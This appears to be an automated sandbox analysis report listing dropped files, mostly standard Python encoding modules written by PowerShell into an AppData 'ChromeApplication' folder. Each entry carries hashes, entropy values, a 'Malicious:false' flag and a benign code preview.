                                                                                                                                                                                                  SHA1:4A47723520F81A1FD9008B68AFE82DCFCB28784F
                                                                                                                                                                                                  SHA-256:BDEECF4466CEBACDC6A8768B96F1F1FC7975B1A120933B2BDD761CC356E97D6E
                                                                                                                                                                                                  SHA-512:7DB2C7392C41BC2A78A978BAF8052EB62731A5115A1DB929256105E9C237EE4D13F15E7F5325C00E3AA907C6F452BF81F935299B082FC736B1294DC7FC4D3D72
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.5.......................@...s....d.Z.d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.Z.e...e...Z.d.S.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...Codec..strictc....................C........t...|.|.t...S...N)...codecs..charmap_encode..encoding_table....self..input..errors..r.....GC:\Users\user\AppData\Local\ChromeApplication\lib\encodings\cp1252.py..encode...........z.Codec.encodec....................C...r....r....).r......charmap_decode..decoding_tabler....r....r....r......decode....r....z.Codec.decodeN).r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....c....................@........e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C........t...|.|.j.t...d...S...Nr....).r....r....r....r......r....r.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\utf_8.cpython-310.pyc.9661160

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1629
                                                                                                                                                                                                  Entropy (8bit):4.7259391979319405
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OVtus1pip3+HUrYPyaGcLXaLOsJkLBBn1U:ObuWxHUPNcLXaasmP1U
                                                                                                                                                                                                  MD5:5F340BC26090CE428D7C33BF7C2A22B4
                                                                                                                                                                                                  SHA1:161FE1E1CC270769C1E9511A6BD5CC3C0159D5B5
                                                                                                                                                                                                  SHA-256:BF3F799605C36D6B7EE2361D6767FB606610DB5C4951443BBDE8662B6BC743BF
                                                                                                                                                                                                  SHA-512:68EEA253A08F3F055260EC62B42C91621A97E21E247802A19B5F3320C026235A63FF5042AA9802F6BD1899D50A408DFAB9657C3EC39C0127B6CFB5B7AF17854F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.........................@...sp...d.Z.d.d.l.Z.e.j.Z.d.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.d...Z.d.S.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N..strictc....................C...s....t...|.|.d...S.).NT)...codecs..utf_8_decode)...input..errors..r.....FC:\Users\user\AppData\Local\ChromeApplication\lib\encodings\utf_8.py..decode....s......r....c....................@...s....e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C...s....t...|.|.j...d...S.).Nr....).r......utf_8_encoder....)...selfr......finalr....r....r......encode....s......z.IncrementalEncoder.encodeN).F)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....c....................@........e.Z.d.Z.e.j.Z.d.S.)...IncrementalDecoderN).r....r....r....r....r......_buffer_decoder....r....r....r....r.................r....c.................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1250.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13993
                                                                                                                                                                                                  Entropy (8bit):4.595187696759194
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:mHhsuOTDvR+UrXPLouhIAs2+icI2DCYCTG3RKjV:DTsuhIAlquq4V
                                                                                                                                                                                                  MD5:164A9C1A625524FCB480DBE56076D738
                                                                                                                                                                                                  SHA1:C21A1A50BBAC7EF8D1CC3A2E093FE5EBDBBD35C4
                                                                                                                                                                                                  SHA-256:3FFEA0100ABEF80F916BC2920B296B2EDDD6ECB06FB3CA07549F95FC92CA1F11
                                                                                                                                                                                                  SHA-512:AB0160965CCED9E7BF45D6A64C34A0AC363B4CF5D2447C303397DB79C5F04ED861D9D0D5FF833C0685029E702534DEFE3EBB5AB5B05C5A5842050221CDC91A5B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp1250 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1250.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1250',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1251.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13668
                                                                                                                                                                                                  Entropy (8bit):4.623567935376835
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:YHhsuOTDvRBUrXPLouhIAs2+iEI0DCYnWEDp+/:lTPuhIAlYrWEo/
                                                                                                                                                                                                  MD5:E81DE8E87BAB1DEFF99125C66229F26E
                                                                                                                                                                                                  SHA1:5800D009E3D4C428B7303532AAD20BA3BBBE8011
                                                                                                                                                                                                  SHA-256:46FA091D1822434E8D0AF7A92439607018872598FCDE44026F413DD973F14C98
                                                                                                                                                                                                  SHA-512:B14BFE809CF20E5FD82CF5E435983DC5FEAA4E5DE19D16AA4BED7FD0CBFD18A429DD0129AA6058053709CE230CE38224F7CE15CFBCD75A803B04ABC85FA9440B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp1251 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1251.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1251',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1252.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13818
                                                                                                                                                                                                  Entropy (8bit):4.5698138915249915
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:OHhsuOTDvR8UrXPLouhIAs2+i/I1DCYkZt6VN6ATdo56G:bTeuhIAlcoZt6to
                                                                                                                                                                                                  MD5:52084150C6D8FC16C8956388CDBE0868
                                                                                                                                                                                                  SHA1:368F060285EA704A9DC552F2FC88F7338E8017F2
                                                                                                                                                                                                  SHA-256:7ACB7B80C29D9FFDA0FE79540509439537216DF3A259973D54E1FB23C34E7519
                                                                                                                                                                                                  SHA-512:77E7921F48C9A361A67BAE80B9EEC4790B8DF51E6AFF5C13704035A2A7F33316F119478AC526C2FDEBB9EF30C0D7898AEA878E3DBA65F386D6E2C67FE61845B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1252',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1253.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13401
                                                                                                                                                                                                  Entropy (8bit):4.649593364658793
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:EHhsuOTDvRPUrXPLouhIAs2+i/I+DCYdlRfA21XHHjfvK8uHZf:hTBuhIAlvRlNr1XO8Ax
                                                                                                                                                                                                  MD5:E86052CD641A07AA72686984073AF47E
                                                                                                                                                                                                  SHA1:D9CAA17B52A5F48087F587B2996388DA799955BF
                                                                                                                                                                                                  SHA-256:E0B0AFBD19DB367C34C505F99A2FCCAFC6BAE3DFD4E316F86375179DCFC60A28
                                                                                                                                                                                                  SHA-512:7F87B2577902646C394FCC2D7A5407B05E23AC3CD07E7749CEDC9898F3E357067729F586011862D9FC8604DB13D0921B060471C3A52B6C17A0F7C5694DDA7788
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp1253 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1253.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1253',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1254.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13809
                                                                                                                                                                                                  Entropy (8bit):4.577307574580316
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:OHhsuOTDvRiUrXPLouhIAs2+i/IfDCYuZt6B5TdjN:bTQuhIAlK6Zt69x
                                                                                                                                                                                                  MD5:490756413A61FC0954EFA491244CD487
                                                                                                                                                                                                  SHA1:849EC325801A2E2CC784A54590482593FF89A5A1
                                                                                                                                                                                                  SHA-256:0986ACD9A25FE91C4720C912322253AD105AB951A2D0D364CF0E522E6E52C174
                                                                                                                                                                                                  SHA-512:BCDC7CB6C94600D15F9A3BFA51BDC0D289C997AC40EC4DA1CB0D91B6BFE875968B6C2834FC03D306EE6A3D022955C1C3435864491AF8548E82ACC60E2A215601
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp1254 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1254.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1254',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1255.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12773
                                                                                                                                                                                                  Entropy (8bit):4.658204122531881
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:IHhsuOTDvRVUrXPLouhIAs2+i/IRDCYLSC51N7jG6ZZPHxvTh:VTTuhIAlQ3Sm7b
                                                                                                                                                                                                  MD5:8B8E1CC22BEF6EDE6E44C4DD2A287FF6
                                                                                                                                                                                                  SHA1:304930955DF0499CBFDF90BFD9BB9A01D0059B23
                                                                                                                                                                                                  SHA-256:C039AD62EE73102915D989CF390F76896C335CA8DBCDD4CA27D5441F76E081BE
                                                                                                                                                                                                  SHA-512:FA779A6E599816AAAA84C1FB715217DE2341399D47E70A440A06E312BA69780E14CB3014D048C7005F5A9025B3AB8D508DA052BFD678AD4E269F10CB1B35AE66
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp1255 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1255.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1255',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1256.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13121
                                                                                                                                                                                                  Entropy (8bit):4.623477051591162
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:2HhsuOTDvRgUrXPLouhIAs2+i75IiPEFPDCYljorsWCdxeiu5it2uncgYejC:TTiuhIAl4P6rsEr
                                                                                                                                                                                                  MD5:2CCBF9B374CE98453955DAD9848C90FF
                                                                                                                                                                                                  SHA1:0E7B99D406E72AF59F80405B9676988CD6881C40
                                                                                                                                                                                                  SHA-256:24A69E11902CC4054280EC2DE38EE836D0BE22EABDB9CDC56D9A7B63C8CDDB06
                                                                                                                                                                                                  SHA-512:4A97C524F951DE4CF08F2EF86F9AA9F4F421BA3327D07E0B883958057E6204A410F42E82E0C7DBBAC8F3252065F96A4255A820753BD6EBE80254E1AFE160FD3F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp1256 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1256.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1256',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1257.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13681
                                                                                                                                                                                                  Entropy (8bit):4.608029292102436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:8HhsuOTDvRzUrXPLouhIAs2+icIkDCYwoe1X:pTluhIAlI0oet
                                                                                                                                                                                                  MD5:544A8ACE12064E96C3E6A7DB436F9F09
                                                                                                                                                                                                  SHA1:ADADE6DC415731BCC23386DF031CA5B003D09881
                                                                                                                                                                                                  SHA-256:902262C0640FC0F21CF85A86456DC33D43E51B07E6C961526BF7F7ED4CE2AB8D
                                                                                                                                                                                                  SHA-512:4830A946DA25CBECDD1AEB5DF055FD1961EF8E32936406889C39EE4F9ACD6A15605DCA448AA73DF0A4BE721BAB6B04C03D02524918FCBB1499C4E7B60863BCE2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp1257 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1257.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1257',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1258.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13671
                                                                                                                                                                                                  Entropy (8bit):4.591778820995035
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:2HhsuOTDvRmUrXPLouhIAs2+i/IZDCYAZtTBd0HXIGPf:TTEuhIAlIMZtlJS
                                                                                                                                                                                                  MD5:11328D7E1CD433053C29BEC6C739FB67
                                                                                                                                                                                                  SHA1:FD2D141516EEF65B903F552AC68CE30AE45A40A8
                                                                                                                                                                                                  SHA-256:A9E1E891DD1F28DEA5ABB5819AEE1477156D288733EB2342F0696F1E5DD0A11D
                                                                                                                                                                                                  SHA-512:E643AFFBC683B99169FDB236184E25DDAC58803FB11799BD56BE44376953DD16F5E4C982CDFCA8D8F79D0B142E294ABAB72F25202F012F4149371B20F408A3E0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp1258 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1258.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1258',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp273.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14439
                                                                                                                                                                                                  Entropy (8bit):4.5334908386243296
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:8HhsuOTDvR8Us0/nt7nw642d0C2UjoDyHg45tgVp3E5EmYI:pT1PtbcWoDumpU+mYI
                                                                                                                                                                                                  MD5:CF85B6224C5FE7C8EA6CBAD1C1BB6155
                                                                                                                                                                                                  SHA1:C8E3B07E4B5447EC58A280414228797EE6816A24
                                                                                                                                                                                                  SHA-256:016C8DA778E50CBCF76815BBD8F6D0D33DBF1FAF852726D85A5A47651C371033
                                                                                                                                                                                                  SHA-512:8FF744A4A173D2F046180A6A5C1A17715E7ADA582278166B2A418DE4C65441A47A040E8040E2385E02A24826082542D6CFBB3B548401ABEA8D0A17FEFD43B660
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp273 generated from 'python-mappings/CP273.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp273',.. encode=Codec().e

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp424.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12362
                                                                                                                                                                                                  Entropy (8bit):4.601902617990224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:aHhsuOTDvRqUwGYPJHjA/KT4RltXARfFVV2IC4FcE8bVO4BG2QST/:3TBcWK3cE8bT1QK
                                                                                                                                                                                                  MD5:85667B33899EC661331A9CA44CB36DEC
                                                                                                                                                                                                  SHA1:E755BF3ACA17896638E62BE91D9C8AFE0A6ED725
                                                                                                                                                                                                  SHA-256:AE6E956B42CF3AE32E988833772FC040F8393DA007048AD2B4E1D621FE6523E7
                                                                                                                                                                                                  SHA-512:4D7178C9AC351A644F6062D09FA9C28D569F48ABF1CC4F906C93B8BCCB151FE450E0A9B7A8EF26BD2851A7CE213F27A309F0EA6A2C999A7C5866432DF9E6FBCB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp424 generated from 'MAPPINGS/VENDORS/MISC/CP424.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp424',.. encode=Cod

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp437.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35262
                                                                                                                                                                                                  Entropy (8bit):4.591583826618043
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:p1LnZkjh4wVdjIVjxAEJHWJn4AVEccqPMy:XqjhJVRKxAEJ2BF6S
                                                                                                                                                                                                  MD5:A11E9C869BD055D6C91354FFFEB7644F
                                                                                                                                                                                                  SHA1:B008E64C808A86312863C194C621214134B4C432
                                                                                                                                                                                                  SHA-256:7B0A9AE2E74D370354CC60CBCFB77AF970364818BE2E2A446187DCCCF9E28ACC
                                                                                                                                                                                                  SHA-512:3A628F1BB8D36845074B4FA66A8B91B5F8365C5677CC81AFA5D7DA1313F328E1B409A3C43249C9D62FADC2B71CE9E7CE70CCD3854BA7B8CBB19CFB79B8AD92FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp437 generated from 'VENDORS/MICSFT/PC/CP437.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp437',.. encode=Codec().enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp500.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13428
                                                                                                                                                                                                  Entropy (8bit):4.523115396759222
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ZHhsuOTDvR7UZkPS9BrG4/RVFIhRNvYkV2H2QB:8TirG4/0RYkgWQB
                                                                                                                                                                                                  MD5:BEE7333323D2BCA3262F13C59414EDD3
                                                                                                                                                                                                  SHA1:57E74B1BA865C5198C26344B2F6F270350C014B4
                                                                                                                                                                                                  SHA-256:A5CAC573ED357CB6C2A672D01696212C25E306936586D94BE0D0130354A4DB6F
                                                                                                                                                                                                  SHA-512:B9DD5137040DC57308093D9C71291668CE7CBEDCA11DBC0D85187C6DEE568CA25F69B67F7FB08A2CA248D966EC622C7CE0DD35C0BA2CD77C860274A11A50827D
                                                                                                                                                                                                  Malicious:false
